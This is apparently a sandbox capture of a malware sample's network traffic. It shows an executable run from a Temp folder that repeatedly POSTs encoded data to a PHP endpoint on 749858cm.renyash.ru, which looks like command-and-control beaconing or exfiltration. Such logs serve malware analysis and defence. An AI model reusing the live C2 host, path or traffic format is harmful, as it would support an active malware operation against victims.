Dec 17, 2024 00:07:56.049729109 CET	4944	OUT	Data Raw: 32 0a 28 33 3f 24 1f 11 30 1c 2a 58 29 2e 1a 3a 30 27 51 1b 0b 28 26 3c 3f 04 25 0c 3c 07 26 5a 3b 57 0a 05 23 1e 53 00 3b 1a 23 52 26 3d 1a 37 3e 28 3b 59 3f 59 57 1c 3a 2b 34 5a 2b 5d 04 56 3c 0c 3f 53 3f 03 0d 1e 31 2b 0e 3d 31 39 32 5e 39 04 Data Ascii: 2(3?$0X).:0'Q(&<?%<&Z;W#S;#R&=7>(;Y?YW:+4Z+]V<?S?1+=192^96:&,8?3)':+1+/X -=8=3 0X5S=.Y75&[<?#:,;7Y(489=?]\!S1#(]4$A'$8+12%'!' :&>1 ,8$)[#01/;F"]% >=646#\<8 ?T::"+X!
Dec 17, 2024 00:07:56.049753904 CET	2472	OUT	Data Raw: 0a 04 17 1f 0b 3c 16 39 20 20 1f 3e 28 39 1d 11 32 3b 2f 19 3f 5b 3f 02 20 5a 3b 31 3d 2c 2b 5e 3a 05 24 10 02 5b 1f 0b 12 3d 3f 16 3b 54 40 3e 27 3f 28 19 23 14 19 29 30 07 06 2e 32 2a 53 3a 31 31 13 55 29 3c 25 16 3e 2b 20 00 3e 58 21 1c 32 16 Data Ascii: <9 >(92;/?[? Z;1=,+^:$[=?;T@>'?(#)0.2S:11U)<%>+ >X!2%74---?\"3!SI/?,?7,P";/-]3/92!) C8%==00<!=Q -7Z!#1=?V$T$Q:49 52=8<_Z1,:]1;3%$8Z1,-9$/R'=8&9;+0%!\4\]2W7
Dec 17, 2024 00:07:56.049767017 CET	2472	OUT	Data Raw: 3a 07 47 3b 25 38 34 52 09 23 2b 15 3e 39 03 1a 32 0b 1b 13 32 2f 24 36 37 0f 00 5d 3f 35 00 10 0a 07 5b 52 24 5e 1f 24 3e 3d 33 12 38 0b 02 2d 22 33 5b 3b 33 12 2c 1b 25 03 5d 1a 27 59 5e 29 31 39 23 1a 04 24 31 2c 3a 30 37 13 29 17 2f 36 2a 3b Data Ascii: :G;%84R#+>922/$67]?5[R$^$>=38-"3[;3,%]'Y^)19#$1,:07)/6*;.7]??\83;W%#)$#2(?+0?X#Z?:(.1??(3@(;/'<(]7Y+,22U%22.9&5.;+\?4:#%6X/C03:R6=&#06>]W;0U8>;59V=<>.,870??U7<,;
Dec 17, 2024 00:07:56.049801111 CET	2472	OUT	Data Raw: 29 2a 21 01 39 28 21 25 38 38 37 59 3e 58 0f 19 31 2f 54 09 3f 30 3b 0a 0e 35 36 12 3e 5b 03 18 3c 3e 2b 53 35 3e 58 1e 38 0a 36 01 2c 5b 19 1e 3f 2f 29 21 3d 08 3a 39 3f 37 12 19 34 57 11 0d 39 56 27 13 3f 0f 24 12 01 35 34 04 24 2d 0f 3d 04 3e Data Ascii: )*!9(!%887Y>X1/T?0;56>[<>+S5>X86,[?/)!=:9?74W9V'?$54$-=>Y2?[(;(W</$;U!_>89%>4&90R? 8 "S$:40);X$)'&)%=)442898!#+?7:<_0^ ;-"$Z>=(47.)3!'0<'.("X13%=!8!,'(8[W7)H/&8?8.?1:
Dec 17, 2024 00:07:56.049849033 CET	2472	OUT	Data Raw: 36 5f 2c 3a 03 29 2a 17 21 3c 2a 3e 3f 07 30 13 08 08 5f 19 32 5e 5c 10 02 36 2b 3e 2e 5b 50 19 3c 5b 0a 19 3e 2d 3c 12 0f 11 2b 58 33 3e 31 32 15 2d 3b 15 3f 57 33 03 39 58 34 3e 3e 14 2b 19 2e 04 1a 07 02 04 53 25 08 20 39 2e 02 2d 59 05 3f 25 Data Ascii: 6_,:)!<>?0_2^\6+>.[P<[>-<+X3>12-;?W39X4>>+.S% 9.-Y?%<1-^%/=5';+8$?-<0:+9$<)_<</#)^/+Y47\9"0W?1ZQ$+3<5[89&=(8P>34?>_%-0/97/<2!?9?&":'_+\>^%4
Dec 17, 2024 00:07:56.049974918 CET	4944	OUT	Data Raw: 37 59 0b 1a 0b 3c 22 0b 38 2c 38 3f 3d 41 37 2f 3f 30 0a 11 0f 07 1b 21 33 33 07 07 30 5b 30 04 02 22 26 03 23 39 39 51 0c 07 1b 34 3b 07 21 2d 3c 54 3b 1f 0c 20 3c 30 0d 43 2c 51 3c 5a 24 28 3f 5f 2f 31 08 00 5e 1b 3a 3b 5f 5a 34 38 3a 1d 09 23 Data Ascii: 7Y<"8,8?=A7/?0!330[0"&#99Q4;!-<T; <0C,Q<Z$(?_/1^:;_Z48:#5<0;814^6="0"2V<39590+8".?12ZT,:33^+<-"%>0\8&'S;'?-8(%7\,)T4XRXA(^<1+%<"<X)&1B8I.9:_9<7<!9)%-?6&7[:003
Dec 17, 2024 00:07:56.049998999 CET	2472	OUT	Data Raw: 23 0c 37 0c 01 25 3b 31 32 00 38 03 2f 3b 2e 1b 20 3e 29 1f 3f 2c 37 13 20 33 08 11 32 3b 23 35 02 26 2b 5d 2b 10 5c 2c 0e 2d 11 00 0b 59 3f 59 37 06 19 33 02 2e 5f 1e 3e 03 2c 1b 38 0e 1d 1b 3f 5a 3c 1b 3a 29 3f 5b 06 39 1a 1b 32 05 3c 53 3e 21 Data Ascii: #7%;128/;. >)?,7 32;#5&+]+\,-Y?Y73._>,8?Z<:)?[92<S>!=03)U576'>Y-6)>_+1,Z$T32&28<=,4^/!=T&?9>"$)90+(>Q32 +Z"Y0!!$A&B3:08!0=%?>0#2 9>%1>+=3 '#Y','>6
Dec 17, 2024 00:07:56.050031900 CET	2472	OUT	Data Raw: 32 52 20 1c 33 10 0f 3a 28 06 35 07 08 30 29 1c 20 5b 1a 3c 09 24 37 23 3f 30 16 2a 21 5f 21 1e 37 56 3d 3a 30 3c 12 2e 32 0e 32 2b 38 17 0c 11 0c 13 18 52 3e 28 31 07 3e 20 16 09 3b 2f 0d 58 0e 38 05 52 0b 2c 2c 39 26 05 3f 04 39 3d 21 3d 3a 5c Data Ascii: 2R 3:(50) [<$7#?0!_!7V=:0<.22+8R>(1> ;/X8R,,9&?9=!=:\<9>^"8>36>P:+/.>S=0+\0<*//[-'>/<XY^",_^??$,8]64\7+R%01:+>P/)>=?$'^-3;/>.[?>!'04SV85S$)-26$6<':?3=3"98
Dec 17, 2024 00:07:56.325999022 CET	2472	OUT	Data Raw: 0e 20 1b 3d 34 10 2e 29 3f 34 5f 12 29 5a 07 3f 01 02 31 5e 3f 41 29 5a 3c 2b 15 00 3f 00 1b 20 28 05 36 1d 08 0e 30 41 3d 0d 22 10 3f 2d 31 5d 0c 58 5b 39 36 12 50 0a 38 57 18 1e 31 2c 27 37 08 2f 3e 5c 26 20 3e 05 3d 27 0e 3b 37 56 15 30 24 08 Data Ascii: =4.)?4_)Z?1^?A)Z<+? (60A="?-1]X[96P8W1,'7/>\& >=';7V0$,:V0'3[(<X:+/)&7^?2D;$'$V4""_&2W<)8R5T98.%)Q%!;ZZ!7 .:6<9$6*08V70%$75!4/>?=9+03'?3%"?Y?:,;#"&S230.
Dec 17, 2024 00:07:56.652834892 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:07:57.858572006 CET	800	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:07:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YFjz4mIm4cr6RS6LrcPOthJKbMyIwvaODRRN8zza%2FEp3OPA1H7aUcw06hzfAykeClEsCNPVoC7b%2FPIcMZH5S0KT9NUkARsY97s6mJqgOKs1x7jveDZkUWXTjs9ObbzWyy2Q97Od2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32551e1ced7d0c-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3417&min_rtt=2041&rtt_var=3518&sent=49&recv=136&lost=0&retrans=0&sent_bytes=25&recv_bytes=131068&delivery_rate=111843&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a Data Ascii: 4<R@X
Dec 17, 2024 00:07:58.093445063 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue
Dec 17, 2024 00:07:58.407820940 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:07:58.922622919 CET	958	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:07:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2Fn0qgbvxB4XJ5Zgj23o5MIZsEDupq%2FFUH30OGZ5lzbnj9n92EEaX04gmL4Q5zkt34lauwpR2KrgSHA6LDA7Ic978jsGnhyn4hgo%2BXah59MYcJbL3nfTXLWGdmCUBwcLweldKMj6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3255291c167d0c-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4929&min_rtt=2041&rtt_var=5512&sent=54&recv=141&lost=0&retrans=0&sent_bytes=855&recv_bytes=133270&delivery_rate=1294900&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 39 56 33 04 36 13 20 3e 27 53 3d 3c 23 0b 27 33 22 05 38 3f 27 19 32 55 32 59 32 31 36 01 32 24 2c 03 20 31 3c 12 24 0f 2c 53 26 0d 23 5d 01 1b 27 09 24 2d 35 01 2b 11 00 1e 26 23 2a 42 32 58 3b 45 25 1a 2c 11 31 0a 3b 55 23 38 2e 5a 3b 21 32 1e 28 3c 3f 5d 39 0e 26 00 20 04 21 52 0d 13 22 52 27 38 07 06 26 31 15 5a 20 33 2f 5a 21 0a 27 1b 27 3c 34 08 25 39 24 1f 33 11 2d 02 25 06 27 5d 28 38 2e 55 20 0c 06 1e 2b 04 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 989V36 >'S=<#'3"8?'2U2Y2162$, 1<$,S&#]'$-5+&#*B2X;E%,1;U#8.Z;!2(<?]9& !R"R'8&1Z 3/Z!''<4%9$3-%'](8.U + R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:07:55.765322924 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:07:56.116885900 CET	1060	OUT	Data Raw: 5d 52 43 54 59 5e 51 5a 5d 5a 59 53 57 5c 5a 53 5a 5f 5f 5a 51 53 52 43 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]RCTY^QZ]ZYSW\ZSZ__ZQSRC]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y (/.)/Y00$[,4^-+]?]7S%2R)&4Q'*("F"#Y
Dec 17, 2024 00:07:56.850689888 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:07:57.085843086 CET	796	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:07:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xJt68gObmYyM%2FVoYHsOHMYcYYXU5s77HkXt9AqJlI1mP0eCsWqVUpxnOGfl9TCxkWSTKXppXsVTsXSb2Et7gWRem9oJrvEv0kveOQYdCFHKteptjsOgxiX%2FlYVz80mY0F1m%2FTGEC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32551f5fa642a7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4857&min_rtt=1773&rtt_var=6834&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=55200&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a Data Ascii: 4<R@X
Dec 17, 2024 00:07:57.277728081 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:07:57.535655975 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:07:57.882471085 CET	1060	OUT	Data Raw: 58 53 46 53 59 5d 54 52 5d 5a 59 53 57 52 5a 5f 5a 57 5f 59 51 58 52 40 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XSFSY]TR]ZYSWRZ_ZW_YQXR@]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y ?>-0#83>+ \<9: ?,&!1" 4<(("F"#Y
Dec 17, 2024 00:07:58.621095896 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:07:58.928164959 CET	811	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:07:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Ck5b43qz%2BwKn8%2FI5bnyRXg9VhqFUePExZrQGu7%2BL4oyjtXE%2FiM4Oz1%2BF0g8GUP7SkcRikuTXstrBgPq8h%2F4xkloQeu%2FodoqE5AHfhcSx7TRz7zwoW9b3f3nsB2j93qOl%2F8kbfwu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32552a6eaf43d4-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4213&min_rtt=1702&rtt_var=5660&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=67000&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:07:59.687362909 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:00.038707018 CET	1060	OUT	Data Raw: 58 52 43 54 59 5d 51 5d 5d 5a 59 53 57 5f 5a 55 5a 51 5f 54 51 59 52 43 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XRCTY]Q]]ZYSW_ZUZQ_TQYRC]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#)?.=+30%-#9;,+^+;2-#/[*8"F"#Y 4
Dec 17, 2024 00:08:00.795656919 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:01.046454906 CET	801	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d0vXBR5gUiB7KvbKjpNXYfZgCUpGI5hc%2FqeOBZW6%2FUNAu8udeqwIf1X3fZSf8b5E94Y5UIjR1MWx7JpQqxskxeQ9zKkNcieGtEYF9Erhlaldo7XvhFSm4ps8%2BAloEjaSUqio9Thv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325537f8b80f47-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4361&min_rtt=1693&rtt_var=5972&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=63365&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49756	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:01.309357882 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:01.663781881 CET	1060	OUT	Data Raw: 5d 52 43 53 59 5e 54 5f 5d 5a 59 53 57 52 5a 53 5a 53 5f 5c 51 59 52 49 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]RCSY^T_]ZYSWRZSZS_\QYRI]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y +>=[;^3V Y0>+\4:4Y,*?)8+%T.=#4<=8"F"#Y
Dec 17, 2024 00:08:02.394216061 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:02.651667118 CET	808	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8hldjIpBZQfRwV4hO5xbX5RKc1LshZGaH16A2m%2BV86QmFaxTb%2BqTQAV%2BNt66F1dadRUC0NNp7zUkEB3A87a3GiRtY8lgY6VmOOjJxpTfTQvWNrk%2B5liyoV3ZLOY1Ma%2BqSuGf4gC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325541fabb4361-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3305&min_rtt=1766&rtt_var=3741&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=103671&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49757	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:02.898967981 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:03.257500887 CET	1060	OUT	Data Raw: 58 50 43 52 5c 58 54 52 5d 5a 59 53 57 53 5a 53 5a 52 5f 5c 51 59 52 45 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XPCR\XTR]ZYSWSZSZR_\QYRE]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#?1=-+X3V8$-48X-:8+(4%2U>*"70(("F"#Y
Dec 17, 2024 00:08:03.982955933 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49763	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:04.050832987 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:04.398134947 CET	1936	OUT	Data Raw: 5d 56 43 50 5c 5f 54 5d 5d 5a 59 53 57 52 5a 5e 5a 53 5f 5e 51 59 52 47 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]VCP\_T]]ZYSWRZ^ZS_^QYRG]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y ),!)=(004$-#4#-+((#V$2S=> '<"F"#Y
Dec 17, 2024 00:08:05.136321068 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:05.389909029 CET	954	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EmLgMFRCA3iWx6LBf00FCXz8rxPE6ZOwd2AcWwtc%2BcWt%2Fy5NbSkVay74IAxoShsumKaWAj1VbL1iMrLtr6n9auCjIrIr9gUZce8OxYy%2F%2FYoZmF%2FT72tM7rjI94SNFzFNDxITUN8L"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32555318367286-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4531&min_rtt=1992&rtt_var=5825&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2226&delivery_rate=65450&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 3a 09 27 3d 3e 1c 23 07 20 0a 3e 3c 27 0f 24 0a 21 5c 3b 06 24 41 31 23 2e 58 32 32 36 07 24 27 33 5f 23 0f 0e 54 24 31 06 54 31 0d 23 5d 01 1b 27 0b 33 2d 39 01 2b 3f 32 13 33 23 3e 0b 25 2e 19 08 27 27 33 0a 25 23 05 53 35 01 22 13 3b 22 29 05 3f 3c 3b 5c 2c 20 21 5c 21 2e 21 52 0d 13 22 18 27 38 3e 13 27 57 23 5b 21 33 09 11 22 0a 37 1a 33 3c 0d 55 32 14 20 58 30 2f 39 01 32 28 01 14 29 38 0f 0d 34 0c 34 1e 2b 04 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:'=># ><'$!\;$A1#.X226$'3_#T$1T1#]'3-9+?23#>%.''3%#S5";")?<;\, !\!.!R"'8>'W#[!3"73<U2 X0/92()844+ R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49764	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:04.169775963 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:04.523039103 CET	1060	OUT	Data Raw: 5d 51 43 53 5c 5b 51 59 5d 5a 59 53 57 5a 5a 51 5a 56 5f 58 51 58 52 42 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]QCS\[QY]ZYSWZZQZV_XQXRB]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y [(5=-<007%=+[4:(]-9?X<;<2&*.Z 4#>"F"#Y
Dec 17, 2024 00:08:05.255424023 CET	25	IN	HTTP/1.1 100 Continue
